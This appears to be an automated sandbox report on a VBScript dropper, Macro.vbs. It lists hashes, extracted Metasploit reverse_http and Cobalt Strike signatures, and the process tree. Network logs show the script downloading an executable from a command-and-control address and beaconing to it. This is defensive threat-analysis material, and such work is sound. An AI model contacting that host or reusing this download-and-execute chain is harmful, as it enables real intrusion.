Analysis
-
max time kernel
142s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240910-en -
resource tags
arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system -
submitted
22-09-2024 10:26
Static task
static1
Behavioral task
behavioral1
Sample
Macro.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Macro.vbs
Resource
win10v2004-20240910-en
General
-
Target
Macro.vbs
-
Size
7KB
-
MD5
69afce0d871fbb27c821c9c1a4767f2a
-
SHA1
cdc01081e7166553a794249a0a1ddbbc954556b8
-
SHA256
5fb73c68d5cafbb6899fa156aa1cbb57e54e00a88aeb3eb670ca97fd102e7232
-
SHA512
d2168ba0d089f06ce27631858f364bd9e4c5844e040bd9b04f17c787b5518fca8727410a2e1dbdd843961c3ed3a723685b97a36fe7c837ed1e0dd0cb7aeedf40
-
SSDEEP
96:30WZ95e7mwwM8ZzBNy23QD4FjsSfK/ehKdhKLTTBor3Hsj260auGOg:VZ90m1MqQEFjxf0cyKLx8gN9uG1
Malware Config
Extracted
metasploit
encoder/shikata_ga_nai
Extracted
metasploit
windows/reverse_http
http://89.197.154.116:7810/jS5PuYLAgMaqgKuBzGjWdQTVEi-GQrM2B4_HTHXdAE2aRnCnqvVP05HBAODR9DRAs6omOzZ6R5twhmlyIB9o80OX2vreTG_JlWV9tvNFAnlCt3DkvjTIgBW9f1LobBmBTiPk_POSLxJ-BNuxWldFmWo_C8JPpkugBdjv3iK3
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 3488 bEENamwAKglG.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bEENamwAKglG.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 5020 wrote to memory of 3488 5020 WScript.exe 84 PID 5020 wrote to memory of 3488 5020 WScript.exe 84 PID 5020 wrote to memory of 3488 5020 WScript.exe 84
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Macro.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\radBED36.tmp\bEENamwAKglG.exe"C:\Users\Admin\AppData\Local\Temp\radBED36.tmp\bEENamwAKglG.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3488
-
Network
-
GEThttps://89.197.154.116:7810/jS5PuYLAgMaqgKuBzGjWdQTVEi-GQrM2B4_HTHXdAE2aRnCnqvVP05HBAODR9DRAs6omOzZ6R5twhmlyIB9o80OX2vreTG_JlWV9tvNFAnlCt3DkvjTIgBW9f1LobBmBTiPk_POSLxJ-BNuxWldFmWo_C8JPpkugBdjv3iK3bEENamwAKglG.exeRemote address:89.197.154.116:7810RequestGET /jS5PuYLAgMaqgKuBzGjWdQTVEi-GQrM2B4_HTHXdAE2aRnCnqvVP05HBAODR9DRAs6omOzZ6R5twhmlyIB9o80OX2vreTG_JlWV9tvNFAnlCt3DkvjTIgBW9f1LobBmBTiPk_POSLxJ-BNuxWldFmWo_C8JPpkugBdjv3iK3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Host: 89.197.154.116:7810
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 247882
-
Remote address:89.197.154.116:7810RequestGET /cm HTTP/1.1
Accept: */*
Cookie: AQtMLQl+f0h5mMrW0qWjeD9TVkTjXjlogAisgVDoPrsmcgVNE6SI65o36lPI2UWdnVzsMOCSn8WY3LxlT2vE8mQDpUZ0hLBTtqC2Ys89vh7ASlt8fpruTs6BPqGZ+DNSfIoJCMuaxC8bf/IuOjli3wxgRUZjwHGK/50QMzCs9AY=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; LBBROWSER)
Host: 89.197.154.116:7810
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 0
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request116.154.197.89.in-addr.arpaIN PTRResponse116.154.197.89.in-addr.arpaIN PTR89-197-154-116virtual1couk
-
Remote address:8.8.8.8:53Request25.140.123.92.in-addr.arpaIN PTRResponse25.140.123.92.in-addr.arpaIN PTRa92-123-140-25deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request71.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request57.169.31.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request97.17.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request86.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request171.39.242.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request36.56.20.217.in-addr.arpaIN PTRResponse
-
Remote address:89.197.154.116:7810RequestGET /cm HTTP/1.1
Accept: */*
Cookie: AQtMLQl+f0h5mMrW0qWjeD9TVkTjXjlogAisgVDoPrsmcgVNE6SI65o36lPI2UWdnVzsMOCSn8WY3LxlT2vE8mQDpUZ0hLBTtqC2Ys89vh7ASlt8fpruTs6BPqGZ+DNSfIoJCMuaxC8bf/IuOjli3wxgRUZjwHGK/50QMzCs9AY=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; LBBROWSER)
Host: 89.197.154.116:7810
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 0
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.28.10ax-0001.ax-msedge.netIN A150.171.27.10
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239339388122_1UI0S3FKTR1B3YGS8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239339388122_1UI0S3FKTR1B3YGS8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 1003167
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F853F199DAC64175BB281258D4283D5B Ref B: LON04EDGE0708 Ref C: 2024-09-22T10:28:47Z
date: Sun, 22 Sep 2024 10:28:46 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301246_1WJH3TXXVOGBRWUGS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239317301246_1WJH3TXXVOGBRWUGS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 718107
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5B107CAB78B8431A949EBC159CFDAD0D Ref B: LON04EDGE0708 Ref C: 2024-09-22T10:28:47Z
date: Sun, 22 Sep 2024 10:28:46 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239340418593_1C85PJIL648X6LOTZ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239340418593_1C85PJIL648X6LOTZ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 512695
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0EE008D316EB45FA85EF01D879D4E953 Ref B: LON04EDGE0708 Ref C: 2024-09-22T10:28:47Z
date: Sun, 22 Sep 2024 10:28:46 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239339388121_1PVG3IWOLFGR4FW9F&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239339388121_1PVG3IWOLFGR4FW9F&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 525731
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 38084DE710A741A7B0939D21BD352A29 Ref B: LON04EDGE0708 Ref C: 2024-09-22T10:28:47Z
date: Sun, 22 Sep 2024 10:28:46 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239340418594_1AB2H0FOTMRSGN1Z8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239340418594_1AB2H0FOTMRSGN1Z8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 679486
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 24E32F98DF0B4F79B141EA808501B6EC Ref B: LON04EDGE0708 Ref C: 2024-09-22T10:28:47Z
date: Sun, 22 Sep 2024 10:28:46 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301655_1DZQZV6Z7ZOAU893W&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239317301655_1DZQZV6Z7ZOAU893W&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 956208
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7D435609C190426E8C22E077B72A773C Ref B: LON04EDGE0708 Ref C: 2024-09-22T10:28:47Z
date: Sun, 22 Sep 2024 10:28:47 GMT
-
Remote address:89.197.154.116:7810RequestGET /cm HTTP/1.1
Accept: */*
Cookie: AQtMLQl+f0h5mMrW0qWjeD9TVkTjXjlogAisgVDoPrsmcgVNE6SI65o36lPI2UWdnVzsMOCSn8WY3LxlT2vE8mQDpUZ0hLBTtqC2Ys89vh7ASlt8fpruTs6BPqGZ+DNSfIoJCMuaxC8bf/IuOjli3wxgRUZjwHGK/50QMzCs9AY=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; LBBROWSER)
Host: 89.197.154.116:7810
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 0
-
89.197.154.116:7810https://89.197.154.116:7810/jS5PuYLAgMaqgKuBzGjWdQTVEi-GQrM2B4_HTHXdAE2aRnCnqvVP05HBAODR9DRAs6omOzZ6R5twhmlyIB9o80OX2vreTG_JlWV9tvNFAnlCt3DkvjTIgBW9f1LobBmBTiPk_POSLxJ-BNuxWldFmWo_C8JPpkugBdjv3iK3tls, httpbEENamwAKglG.exe9.6kB 259.1kB 195 194
HTTP Request
GET https://89.197.154.116:7810/jS5PuYLAgMaqgKuBzGjWdQTVEi-GQrM2B4_HTHXdAE2aRnCnqvVP05HBAODR9DRAs6omOzZ6R5twhmlyIB9o80OX2vreTG_JlWV9tvNFAnlCt3DkvjTIgBW9f1LobBmBTiPk_POSLxJ-BNuxWldFmWo_C8JPpkugBdjv3iK3HTTP Response
200 -
2.3kB 1.8kB 12 9
HTTP Request
GET https://89.197.154.116:7810/cmHTTP Response
200 -
2.3kB 1.7kB 13 8
HTTP Request
GET https://89.197.154.116:7810/cmHTTP Response
200 -
150.171.28.10:443https://tse1.mm.bing.net/th?id=OADD2.10239317301655_1DZQZV6Z7ZOAU893W&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90tls, http2155.6kB 4.6MB 3299 3294
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239339388122_1UI0S3FKTR1B3YGS8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301246_1WJH3TXXVOGBRWUGS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239340418593_1C85PJIL648X6LOTZ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239339388121_1PVG3IWOLFGR4FW9F&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239340418594_1AB2H0FOTMRSGN1Z8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301655_1DZQZV6Z7ZOAU893W&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Response
200 -
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
2.1kB 1.7kB 9 8
HTTP Request
GET https://89.197.154.116:7810/cmHTTP Response
200
-
72 B 158 B 1 1
DNS Request
28.118.140.52.in-addr.arpa
-
73 B 116 B 1 1
DNS Request
116.154.197.89.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
25.140.123.92.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
71.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
57.169.31.20.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
97.17.167.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
232.168.11.51.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
86.23.85.13.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
71 B 131 B 1 1
DNS Request
36.56.20.217.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
88.156.103.20.in-addr.arpa
-
62 B 170 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
150.171.28.10150.171.27.10
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD51a03772b6d1e5a3d0cedc1ca8deba1e1
SHA1413bfb736e1bfa09ad9ef10816a5c7d49e25f2d8
SHA2568e14e8b9f57e29ee9b73f11ed05ecc3bb1968bfbb20923bd55fb31e1352c38f5
SHA5128b7cf32af353019fe11135040f2ec00bb7ffe500fc94c31f85f9fc2a5ba9dad990f587616dddedfed9b1435de997f9142e8442b0d4851c6f84cca28a98880231